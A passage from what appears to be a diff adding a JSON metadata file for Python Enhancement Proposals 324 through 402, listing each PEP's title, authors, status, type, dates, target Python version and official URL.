"superseded_by": null, + "url": "https://peps.python.org/pep-0324/" + }, + "325": { + "number": 325, + "title": "Resource-Release Support for Generators", + "authors": "Samuele Pedroni", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0325/" + }, + "326": { + "number": 326, + "title": "A Case for Top and Bottom Values", + "authors": "Josiah Carlson, Terry Reedy", + "discussions_to": null, + "status": "Rejected", + "type": 
"Standards Track", + "topic": "", + "created": "20-Dec-2003", + "python_version": "2.4", + "post_history": "20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, 21-Feb-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0326/" + }, + "327": { + "number": 327, + "title": "Decimal Data Type", + "authors": "Facundo Batista", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2003", + "python_version": "2.4", + "post_history": "30-Nov-2003, 02-Jan-2004, 29-Jan-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0327/" + }, + "328": { + "number": 328, + "title": "Imports: Multi-Line and Absolute/Relative", + "authors": "Aahz", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Dec-2003", + "python_version": "2.4, 2.5, 2.6", + "post_history": "08-Mar-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0328/" + }, + "329": { + "number": 329, + "title": "Treating Builtins as Constants in the Standard Library", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2004", + "python_version": "2.4", + "post_history": "18-Apr-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0329/" + }, + "330": { + "number": 330, + "title": "Python Bytecode Verification", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "17-Jun-2004", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0330/" + }, + "331": { + "number": 331, + "title": "Locale-Independent Float/String Conversions", + "authors": "Christian R. Reis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2003", + "python_version": "2.4", + "post_history": "21-Jul-2003, 13-Aug-2003, 18-Jun-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0331/" + }, + "332": { + "number": 332, + "title": "Byte vectors and String/Unicode Unification", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2004", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0332/" + }, + "333": { + "number": 333, + "title": "Python Web Server Gateway Interface v1.0", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "07-Dec-2003", + "python_version": null, + "post_history": "07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3333", + "url": "https://peps.python.org/pep-0333/" + }, + "334": { + "number": 334, + "title": "Simple Coroutines via SuspendIteration", + "authors": "Clark C. 
Evans", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2004", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0334/" + }, + "335": { + "number": 335, + "title": "Overloadable Boolean Operators", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Aug-2004", + "python_version": "3.3", + "post_history": "05-Sep-2004, 30-Sep-2011, 25-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0335/" + }, + "336": { + "number": 336, + "title": "Make None Callable", + "authors": "Andrew McClelland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Oct-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0336/" + }, + "337": { + "number": 337, + "title": "Logging Usage in the Standard Library", + "authors": "Michael P. Dubner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2004", + "python_version": "2.5", + "post_history": "10-Nov-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0337/" + }, + "338": { + "number": 338, + "title": "Executing modules as scripts", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2004", + "python_version": "2.5", + "post_history": "08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0338/" + }, + "339": { + "number": 339, + "title": "Design of the CPython Compiler", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "02-Feb-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0339/" + }, + "340": { + "number": 340, + "title": "Anonymous Block Statements", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0340/" + }, + "341": { + "number": 341, + "title": "Unifying try-except and try-finally", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0341/" + }, + "342": { + "number": 342, + "title": "Coroutines via Enhanced Generators", + "authors": "Guido van Rossum, Phillip J. 
Eby", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0342/" + }, + "343": { + "number": 343, + "title": "The \"with\" Statement", + "authors": "Guido van Rossum, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-May-2005", + "python_version": "2.5", + "post_history": "02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, 30-Jul-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0343/" + }, + "344": { + "number": 344, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0344/" + }, + "345": { + "number": 345, + "title": "Metadata for Python Software Packages 1.2", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "28-Apr-2005", + "python_version": "2.7", + "post_history": "`22-Dec-2009 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/MKHXVV746H7ZDFN62Z72VNAX6KIRXNRO/", + "requires": null, + "replaces": "314", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0345/" + }, + "346": { + "number": 346, + "title": "User Defined (\"``with``\") Statements", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0346/" + }, + "347": { + "number": 347, + "title": "Migrating the Python CVS to Subversion", + "authors": "Martin von L\u00f6wis", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "14-Jul-2004", + "python_version": null, + "post_history": "14-Jul-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0347/" + }, + "348": { + "number": 348, + "title": "Exception Reorganization for Python 3.0", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0348/" + }, + "349": { + "number": 349, + "title": "Allow str() to return unicode strings", + "authors": "Neil Schemenauer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2005", + "python_version": "2.5", + "post_history": "06-Aug-2005", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/M2Y3PUFLAE23NPRJPVBYF6P5LW5LVN6F/", + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0349/" + }, + "350": { + "number": 350, + "title": "Codetags", + "authors": "Micah Elliott", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "27-Jun-2005", + "python_version": null, + "post_history": "10-Aug-2005, 26-Sep-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0350/" + }, + "351": { + "number": 351, + "title": "The freeze protocol", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0351/" + }, + "352": { + "number": 352, + "title": "Required Superclass for Exceptions", + "authors": "Brett Cannon, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0352/" + }, + "353": { + "number": 353, + "title": "Using ssize_t as the index type", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0353/" + }, + "354": { + "number": 354, + "title": "Enumerations in Python", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2005", + "python_version": "2.6", + "post_history": "20-Dec-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "435", + "url": "https://peps.python.org/pep-0354/" + }, + "355": { + "number": 355, + "title": "Path - Object oriented filesystem paths", + "authors": "Bj\u00f6rn Lindqvist", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0355/" + }, + "356": { + "number": 356, + "title": "Python 2.5 Release Schedule", + "authors": "Neal Norwitz, Guido van Rossum, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "07-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0356/" + }, + "357": { + "number": 357, + "title": "Allowing Any Object to be Used for Slicing", + "authors": "Travis Oliphant", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0357/" + }, + "358": { + "number": 358, + "title": "The \"bytes\" Object", + "authors": "Neil Schemenauer, Guido van 
Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2006", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0358/" + }, + "359": { + "number": 359, + "title": "The \"make\" Statement", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2006", + "python_version": "2.6", + "post_history": "05-Apr-2006, 06-Apr-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0359/" + }, + "360": { + "number": 360, + "title": "Externally Maintained Packages", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "30-May-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0360/" + }, + "361": { + "number": 361, + "title": "Python 2.6 and 3.0 Release Schedule", + "authors": "Neal Norwitz, Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jun-2006", + "python_version": "2.6, 3.0", + "post_history": "17-Mar-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0361/" + }, + "362": { + "number": 362, + "title": "Function Signature Object", + "authors": "Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2006", + "python_version": "3.3", + "post_history": "04-Jun-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120682.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0362/" + }, + "363": { + "number": 363, + "title": "Syntax For Dynamic Attribute Access", + "authors": "Ben North", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2007", + "python_version": null, + "post_history": "12-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0363/" + }, + "364": { + "number": 364, + "title": "Transitioning to the Py3K Standard Library", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2007", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0364/" + }, + "365": { + "number": 365, + "title": "Adding the pkg_resources module", + "authors": "Phillip J. 
Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0365/" + }, + "366": { + "number": 366, + "title": "Main module explicit relative imports", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "2.6, 3.0", + "post_history": "01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0366/" + }, + "367": { + "number": 367, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "2.6", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0367/" + }, + "368": { + "number": 368, + "title": "Standard image protocol and class", + "authors": "Lino Mastrodomenico", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2007", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0368/" + }, + "369": { + "number": 369, + "title": "Post import hooks", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": "02-Dec-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0369/" + }, + "370": { + "number": 370, + "title": "Per user site-packages directory", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0370/" + }, + "371": { + "number": 371, + "title": "Addition of the multiprocessing package to the standard library", + "authors": "Jesse Noller, Richard Oudkerk", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-May-2008", + "python_version": "2.6, 3.0", + "post_history": "`03-Jun-2008 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0371/" + }, + "372": { + "number": 372, + "title": "Adding an ordered dictionary to collections", + "authors": "Armin Ronacher, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2008", + "python_version": "2.7, 3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0372/" + }, + "373": { + "number": 373, + "title": "Python 2.7 Release Schedule", + "authors": 
"Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "03-Nov-2008", + "python_version": "2.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0373/" + }, + "374": { + "number": 374, + "title": "Choosing a distributed VCS for the Python project", + "authors": "Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "07-Nov-2008", + "python_version": null, + "post_history": "07-Nov-2008, 22-Jan-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0374/" + }, + "375": { + "number": 375, + "title": "Python 3.1 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "08-Feb-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0375/" + }, + "376": { + "number": 376, + "title": "Database of Installed Python Distributions", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Feb-2009", + "python_version": "2.7, 3.2", + "post_history": "`22-Jun-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0376/" + }, + "377": { + "number": 377, + "title": "Allow __enter__() methods to skip the statement body", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "08-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0377/" + }, + "378": { + "number": 378, + "title": "Format Specifier for Thousands Separator", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "12-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0378/" + }, + "379": { + "number": 379, + "title": "Adding an Assignment Expression", + "authors": "Jervis Whitley", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0379/" + }, + "380": { + "number": 380, + "title": "Syntax for Delegating to a Subgenerator", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-June/112010.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0380/" + }, + "381": { + "number": 381, + "title": 
"Mirroring infrastructure for PyPI", + "authors": "Tarek Ziad\u00e9, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Mar-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0381/" + }, + "382": { + "number": 382, + "title": "Namespace Packages", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Apr-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0382/" + }, + "383": { + "number": 383, + "title": "Non-decodable Bytes in System Character Interfaces", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0383/" + }, + "384": { + "number": 384, + "title": "Defining a Stable ABI", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-May-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0384/" + }, + "385": { + "number": 385, + "title": "Migrating from Subversion to Mercurial", + "authors": "Dirkjan Ochtman, Antoine Pitrou, Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "25-May-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0385/" + }, + "386": { + "number": 386, + "title": "Changing the version comparison module in Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Jun-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "440", + "url": "https://peps.python.org/pep-0386/" + }, + "387": { + "number": 387, + "title": "Backwards Compatibility Policy", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "18-Jun-2009", + "python_version": null, + "post_history": "`19-Jun-2009 `__, `12-Jun-2020 `__, `19-Dec-2022 `__, `16-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": "291", + "superseded_by": null, + "url": "https://peps.python.org/pep-0387/" + }, + "389": { + "number": 389, + "title": "argparse - New Command Line Parsing Module", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Sep-2009", + "python_version": "2.7, 3.2", + "post_history": "27-Sep-2009, 24-Oct-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0389/" + }, + "390": { + "number": 390, + "title": "Static metadata for Distutils", 
+ "authors": "Tarek Ziad\u00e9", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "10-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-April/020597.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0390/" + }, + "391": { + "number": 391, + "title": "Dictionary-Based Configuration For Logging", + "authors": "Vinay Sajip", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0391/" + }, + "392": { + "number": 392, + "title": "Python 3.2 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-Dec-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0392/" + }, + "393": { + "number": 393, + "title": "Flexible String Representation", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0393/" + }, + "394": { + "number": 394, + "title": "The \"python\" Command on Unix-Like Systems", + "authors": "Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hron\u010dok, Carol Willing", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Mar-2011", + "python_version": null, + "post_history": "04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, 26-Jun-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116594.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0394/" + }, + "395": { + "number": 395, + "title": "Qualified Names for Modules", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2011", + "python_version": "3.4", + "post_history": "05-Mar-2011, 19-Nov-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0395/" + }, + "396": { + "number": 396, + "title": "Module Version Numbers", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "16-Mar-2011", + "python_version": null, + "post_history": "05-Apr-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0396/" + }, + "397": { + "number": 397, + "title": "Python launcher for Windows", + "authors": "Mark Hammond, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Mar-2011", + "python_version": "3.3", + "post_history": "21-Jul-2011, 17-May-2011, 15-Mar-2011", + "resolution": 
"https://mail.python.org/pipermail/python-dev/2012-June/120505.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0397/" + }, + "398": { + "number": 398, + "title": "Python 3.3 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Mar-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0398/" + }, + "399": { + "number": 399, + "title": "Pure Python/C Accelerator Module Compatibility Requirements", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Apr-2011", + "python_version": "3.3", + "post_history": "04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0399/" + }, + "400": { + "number": 400, + "title": "Deprecate codecs.StreamReader and codecs.StreamWriter", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-May-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0400/" + }, + "401": { + "number": 401, + "title": "BDFL Retirement", + "authors": "Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "01-Apr-2009", + "python_version": null, + "post_history": "01-Apr-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0401/" + }, + "402": { + "number": 402, + "title": "Simplified Package Layout and Partitioning", + "authors": "Phillip J. 
